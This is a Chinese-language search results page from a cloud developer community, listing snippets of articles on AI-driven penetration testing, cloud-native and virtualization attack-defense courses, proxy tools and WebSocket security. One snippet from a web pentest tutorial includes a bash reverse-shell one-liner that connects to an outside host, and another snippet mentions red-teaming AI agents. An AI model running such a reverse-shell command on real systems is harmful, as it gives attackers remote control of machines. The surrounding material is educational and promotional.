首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • AI驱动安全攻防:Antix系统实现零调优智能渗透

    Antix通过Meta-Tooling架构重构AI攻防范式 系统采用三层架构设计: Meta-Tooling层:通过Python Executor提供代码级工具编排能力 沙盒环境:专为AI设计的Ubuntu 驱动渗透,无预设扫描SOP (来源:Antix团队实战数据) 腾讯云黑宫松大赛验证系统可靠性 参赛版本Agent仅使用200行基础提示词,未针对Benchmark测试调优。 通过Meta-Tooling设计模式,使AI更高效执行安全测试意图,在真实攻防场景中验证了系统的泛化能力和实战价值(来源:比赛实战记录)。 腾讯云安全奠定AI攻防技术领先性 基于意图工程(Intent Engineering) 前沿理念,提出AI Native Programming Language技术路线。 腾讯云安全具备三大技术壁垒: 垂类基础设施(C2、扫描器等) 攻防经验沉淀 专业数据积累 (来源:腾讯云安全技术规划) 数据溯源:所有数据均来自腾讯云黑宫松智能渗透挑战赛官方材料、Antix系统架构文档及实战记录

    20710编辑于 2026-04-04
  • 来自专栏网络安全技术点滴分享

    Trail of Bits晋级AIxCC决赛:AI驱动的网络安全攻防实战

    DEF CON的AIxCC舞台汇聚了网络安全AI领域的领军人物,包括DARPA信息创新办公室主任Kathleen Fisher博士、谷歌安全工程副总裁Heather Adkins等专家,并举办了"LLM 我们要感谢为Buttercup倾注专业知识和激情的工程师团队,也感谢DARPA组织这场推动AI网络安全边界的前沿竞赛。自动化的漏洞发现与修复未来可期,我们很荣幸能站在这一领域的最前沿。

    37300编辑于 2025-08-17
  • AI驱动智能渗透测试:腾讯云安全Agent框架赋能高效攻防实践

    直面智能渗透测试的效率与安全瓶颈 当前网络安全攻防场景中,传统渗透测试依赖人工经验,存在三大核心痛点: 效率低下:多轮漏洞探索耗时长,复杂场景下Agent协同易中断,如材料提及“Agent多轮稳定执行需确保页面差异可追踪 undefined理想与现实的差距体现为:企业需自动化、可量化、高稳定的智能渗透能力,以应对动态攻防挑战(数据来源:云鼎实验室技术文档)。 部署Multi-Agent框架与Programmatic安全工具链 腾讯云安全提供AI驱动智能渗透测试方案,核心架构基于Multi-Agent Framework与Programming-not-Prompting 理念(数据来源:长亭科技AI攻防技术研究组): Agent协同体系:设Plan Agent(衔接探索与利用,生成固定执行序列)、XSS Agent(调用xss_scan/xss_bruteforce (注:所有数据均源自腾讯云安全公开技术文档、云鼎实验室报告及Hackathon挑战赛执行日志,无主观臆测。)

    36020编辑于 2026-04-06
  • 腾讯云AI驱动安全攻防:构建自动化渗透测试智能体

    应对传统安全渗透测试高成本与低效率挑战 企业安全渗透测试长期面临高度依赖人工专家经验、测试周期长和成本高昂的痛点。 ),通过状态管理器和数据库实现任务协调 端到端架构基于AutoPT概念,通过GRPO强化学习训练,直接从原始输入学习渗透测试映射关系 团队采用双路径演进策略,同步推进方法论优化和端到端技术探索 腾讯云安全能力支撑智能攻防体系 腾讯云云鼎实验室和腾讯安全众测提供核心安全能力支持,结合Claude Skills技术实现专业化技能动态加载。 数据来源:腾讯云黑盲松Tencent Cloud Hackathon智能渗透挑战赛技术材料 技术专家:仪明(腾讯云安全专家)、尹超凡(Ant Group安全专家) 核心机构:腾讯云安全、云鼎实验室 、腾讯安全众测

    25120编辑于 2026-04-04
  • 腾讯安全众测平台:基于AI驱动与产学研协同的攻防生态建设

    破解攻防演进瓶颈:人才供需失衡与漏洞价值度量缺失 当前网络安全行业在攻防实战与平台生态建设上面临双重战略困境: 安全价值难以量化:传统模式停留在单一的“找漏洞”阶段,缺乏对漏洞实际业务影响的深度挖掘,导致企业的安全投入难以呈现直观的投资回报 白帽人才供给断层:产业界存在显著的安全人才供需困局,校园理论教学与企业实际攻防实战之间存在断裂,缺乏全链条的培养体系。 驱动自动化防御:探索AI驱动的威胁狩猎模式 在技术落地与应用演进层面,腾讯安全众测平台正跨越传统众测模式,向AI驱动的自动化安全测试迈进: 核心应用方向:平台业务重点已扩展至探索AI驱动的自动化渗透与威胁狩猎 制造AI安全新趋势:定义攻防标准并打造技术策源地 在AI时代的安全博弈中,腾讯安全众测平台的核心技术壁垒与战略选择在于: 掌握标准制定权:摒弃跟随策略,致力于定义AI时代的攻防新标准,从行业趋势的“跟随者 技术代际领先:驱动中国安全技术从“追跑”跨越至“领跑”阶段,将腾讯安全众测平台打造为AI安全领域的“技术策源地”,确保在对抗日益复杂的自动化攻击时具备底层技术确定性。

    20120编辑于 2026-04-04
  • AI驱动安全攻防:腾讯云Superposition框架赋能自动化渗透测试

    识别智能攻防效能瓶颈 行业面临AI时代安全攻防复杂度提升与人工渗透测试效率不足的矛盾。 部署Multi-Agent协同防御体系 腾讯云提供AI驱动安全框架,以Superposition为核心(云鼎实验室研发),整合多技术模块: 架构层:Multi-Agent Framework(含Plan 驱动安全未来”技术文档)。 腾讯云黑宫松Hackathon实战验证 客户案例:腾讯云黑宫松Tencent Cloud Hackathon智能渗透挑战赛(TCNTCM等多赛道),长亭科技AI攻防技术研究组(专注AI x安全能力边界突破 驱动安全未来”、长亭科技“工程实现”文档)。

    21910编辑于 2026-04-06
  • AI代理部署安全挑战与红队攻防基准

    安全挑战在AI代理部署中的体现:来自大规模公开竞赛的见解近期进展使得基于大语言模型的AI代理能够通过结合语言模型推理与工具、内存和网络访问,自主执行复杂任务。 为探究该问题,我们开展了迄今规模最大的公开红队测试竞赛,针对22个前沿AI代理覆盖44个真实部署场景。 我们的研究结果凸显了当前AI代理中存在的关键且持续存在的漏洞。通过发布ART基准及配套评估框架,我们旨在支持更严格的安全评估,并推动更安全代理部署的进展。

    21010编辑于 2025-08-23
  • 深度伪造到深度信任:揭露AI安全攻防

    这场高强度的攻防战正在重新定义数字时代的信任基础。2024年,网络犯罪分子发起了超过10.5万次深度伪造攻击,相当于每五分钟就发生一次。这场由AI技术驱动安全攻防战已经深入到我们数字生活的各个角落。 深度伪造攻击已经形成了多方面的威胁格局:在制造业中,远程协调和供应链信任依赖度高的环境中,风险更加严重;在金融领域,身份欺诈在2024年激增42%,主要原因是AI驱动的攻击;在政治领域,伪造政治领导人的言论可能影响公众舆论和选举结果 Mitek的Digital Fraud Defender的三组件架构反映了AI驱动的欺诈需要多方面防御的现实。组织在面临日益复杂的攻击向量时,不能再依赖单点解决方案。 这一举措解决了AI的双重用途风险,并为行业中的伦理保障设立了先例。这种公私合作模式正在成为AI治理的重要组成部分。Anthropic与美国国防部达成了2亿美元的协议,为国家安全原型化AI能力。 在这个生态中,AI对抗AI攻防战仍在持续,但人类最终将通过技术、政策和教育的多维度协同,在这场数字时代的真假博弈中占据上风。

    1.1K10编辑于 2025-08-22
  • 来自专栏极致攻防实验室

    AI驱动安全扫描工具:HackBot

    免责声明: 本文章或工具仅供安全研究使用,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,极致攻防实验室及文章作者不为此承担任何责任 本文将使用Golang语言,利用OpenAI的Function calling功能与Projectdiscovery武器库进行结合,制作一个用于安全扫描的工具:HackBot 。 2. 2.2 为什么用Fucntion calling     使用过chatgpt的同学都知道,chatgpt没有实时的网络数据,特别是在安全领域某些问题会存在安全限制,而Fucntion calling正好可以解决这一问题 使用Fucntion calling进行安全扫描     下面将使用Go语言,利用OpenAI的Function calling功能与projectdiscovery武器库进行结合,制作一个用于安全扫描的概念小工具

    57440编辑于 2023-07-01
  • 来自专栏Bypass

    《云原生安全攻防》-- 云原生攻防矩阵

    云原生攻防矩阵: 云原生环境攻击路径的全景视图,清晰每一步采取的攻击技术。 目前,多个云厂商和安全厂商都已经梳理了多个针对容器安全的威胁矩阵,我们可以参考这些成熟的模型,结合个人对云原生安全的理解,构建自己的攻防矩阵。 然后通过不断的学习和实践,我们可以持续优化和补充这个攻防矩阵,从而有效提升对云原生环境的保护能力。 针对云原生环境的攻击技术,与传统的基于Windows和Linux的通用攻击技术有很大的不同,在这里,我们梳理了一个针对容器和K8s常见攻击技术的云原生攻防矩阵。 视频版:《云原生安全攻防》--云原生攻防矩阵

    69311编辑于 2024-04-16
  • 安全服务平台:企业数字化转型的“守护神”与腾讯云的实践创新

    本文将解析安全服务平台的核心价值,并通过行业案例对比,重点推荐腾讯云安全服务平台(SPS)如何以AI驱动和全流程闭环能力,成为企业安全建设的标杆选择。 安全服务平台凭借智能化、集约化的特性,正成为企业安全运营的“数字免疫系统”。而腾讯云安全服务平台(SPS)凭借国家级攻防经验与AI大模型技术,为企业提供了从威胁识别到处置的全生命周期管理能力。 ,识别APT攻击链 自动化响应:联动防火墙、SIEM等系统实现分钟级处置(腾讯云安全中心支持98%告警自动处置) 业务连续性保障:通过攻防演练沉淀防御资产,降低业务中断风险 二、主流安全服务平台对比 平台名称 核心功能 技术架构 服务模式 适用场景 360安全AI智能体驱动 AI驱动的威胁狩猎 基于20年安全知识库训练的大模型,可识别0day攻击特征 实现攻击链自动重构,处置效率较人工提升10倍 2.

    45010编辑于 2025-12-24
  • 来自专栏betasec

    安全攻防 | Metasploit 代理

    声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全

    1.8K10发布于 2021-03-16
  • 来自专栏betasec

    安全攻防 | EarthWorm 代理

    - 往期推荐 - 安全攻防 | reGeorg+Proxifier代理工具 安全攻防 | CobaltStrike代理工具 安全攻防 | Metasploit代理工具 【推荐书籍】

    1.1K20发布于 2021-03-16
  • 来自专栏/root

    Web安全渗透攻防技术

    -i <&3 >&3 2>&3");' bash 反弹 # 修改IP 端口 bash -i >& /dev/tcp/www.varin.cn/10005 0>&1 nmap 简介:开源免费的网络发现和安全审计工具

    27310编辑于 2025-09-28
  • 来自专栏网络安全攻防

    WebSocket攻防对抗安全指南

    WebSocket限制为HTTP,未来的实现可以在专用端口上使用更简单的握手,而无需重新设计整个协议,该协议允许在受控环境中运行不受信任代码的客户端与选择和该代码进行通信的远程主机之间进行双向通信,它使用的安全模型为 在发送指示应该关闭连接的控制帧之后,对等体不发送任何进一步的数据,在接收到指示应该关闭连接的控制帧之后,对等体丢弃接收到的任何进一步的数据且不再做任何处理,同时两个对等方同时发起此握手也是安全的,关闭握手旨在补充 我们接着上面的演示示例点击"断开"使得已经建立的WebSocket连接直接断开 WireShark抓包如下: 客户端发送断开链接请求(这里的Opcode 8标识此帧为关闭帧) 服务器端收到关闭帧并断开链接 安全风险 操纵消息 基本介绍 在对网站进行安全测试时我们可以使用Burpsuite代理拦截整个通信数据,如果我们在Burpsuite中的"Proxy"界面的"WebSockets History"选项卡中看到有交互数据或者在 抓包发送一条数据,并在WebSockets History中查看数据,修改包构造成XSS的POC 简易实例2 在学习WebSocket安全攻击手法的同时看到

    1.5K10编辑于 2024-12-20
  • 来自专栏betasec

    安全攻防 | reGeorg 代理

    声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全

    1.4K10发布于 2021-03-16
  • 数字化转型时代:腾讯云漏洞治理服务助力企业精准锁定修复优先级

    传统漏洞管理存在三大痛点: 情报滞后:行业平均漏洞响应延迟达72小时 研判困难:日均产生60+新漏洞公告,人工分析效率不足 修复冲突:高危漏洞修复常与业务连续性产生矛盾 腾讯云VGS通过AI驱动的漏洞优先级技术 攻防演练保障 专项服务:提供红蓝对抗场景下的漏洞生命周期管理 数据支撑:某银行客户通过VGS将演练期间漏洞修复率提升至92% 3. 传统漏洞管理方案 情报来源 300+一手情报渠道 主要依赖公开CVE/CNNVD 响应时效 平均提前3- 腾讯云漏洞治理服务(VGS)依托腾讯20余年安全攻防实战经验,以AI驱动的VPT技术为核心,构建起覆盖「情报-分析-修复-验证」的全链路能力闭环。 相较于传统方案,VGS在情报时效性上领先行业3-5天,在修复精准度上实现误报率降低65%,并通过定制化监测、PoC验证等创新功能,显著降低企业安全运营成本。

    24410编辑于 2026-01-06
  • 来自专栏绿盟科技研究通讯

    攻防课程系列(五):云原生安全攻防

    概述 近日,绿盟科技星云实验室与北京豪密科技有限公司联合推出了一项云攻防技术培训课程。 该课程旨在根据客户需求,为客户提供专题培训,帮助客户熟悉常见的云安全架构,并提供云攻防技术理解,同时结合模拟攻击实验提升攻防能力。该课程参与学员涵盖了特殊行业的单位、国企等十多家单位。 课程共分为六个章节,分别就云计算基础、云上攻击路径、云上资产发现与信息收集、云服务安全攻防、云原生安全攻防以及虚拟化安全攻防进行了详细介绍。 本系列文章旨在以科普为目的面向各位读者推出,本文是该系列的第五篇云原生攻防课程。涵盖了云原生以及云原生安全定义、容器及编排系统典型安全风险、靶场实验实操三个部分。 最后,通过实验以实战化的方式进行云原生攻防。 二. 云原生安全 2.1 云原生 云原生指构建和运行应用以充分利用通过云交付模式交付的分布式计算。

    87641编辑于 2023-08-31
  • 来自专栏绿盟科技研究通讯

    攻防课程系列(六):虚拟化安全攻防

    该课程旨在根据客户需求,为客户提供专题培训,帮助客户熟悉常见的云安全架构,并提供云攻防技术理解,同时结合模拟攻击实验提升攻防能力。该课程参与学员涵盖了特殊行业的单位、国企等十多家单位。 课程共分为六个章节,分别就云计算基础、云上攻击路径、云上资产发现与信息收集、云服务层攻防、云原生安全攻防以及虚拟化安全攻防进行了详细介绍。 本系列文章旨在以科普为目的面向各位读者推出。 本文是该系列的第六篇,主题为虚拟化安全攻防,主要包括虚拟化安全风险和虚拟机逃逸技术两部分。 二. 虚拟化安全风险分析 本部分主要参考自NIST.SP.800-125Ar1 [3]。 Hypervisor平台中的设备驱动是不可信的,除非它们带有安全证书。 3. 提供虚拟机隔离的Hypervisor核心组件是可信的。 4. 利用虚拟设备或驱动程序的设计缺陷,攻击者可能通过虚拟网络接口、虚拟磁盘等设备逃出虚拟机环境。 3.

    1.6K60编辑于 2023-08-31
  • 来自专栏公共互联网反网络钓鱼(APCN)

    金融行业可信 AI 安全体系构建与攻防实践研究

    关键词:金融 AI;网络安全;可信 AI;可追溯性;反网络钓鱼;云安全1 引言数字经济驱动下,银行业、证券业、保险业加速以 AI 重构核心流程,覆盖智能风控、反欺诈、客户服务、运营自动化、投资决策等场景 本文以 IBM 在金融 AI 安全领域的实践框架为核心,结合工程实现、合规要求、攻防对抗,构建覆盖风险分析、技术防御、治理体系、未来演进的完整研究脉络,确保论点闭环、技术严谨、落地可行。 2 AI 对金融网络风险的重构机理与防御响应2.1 AI 驱动攻击的规模化与智能化升级AI 并未颠覆攻击逻辑,而是以自动化加速传统攻击链条,实现工业级投放。 2.3 攻防对抗下的金融安全新范式AI 使攻防进入高速循环:攻击侧追求规模化与低成本,防御侧追求实时性与精准度。 8 金融 AI 安全的未来演进与治理框架8.1 安全原生成为标准范式安全从合规成本转为创新基础,嵌入 AI 设计、开发、部署、运营全生命周期,监管与威胁驱动行业统一标准。

    28710编辑于 2026-03-31
领券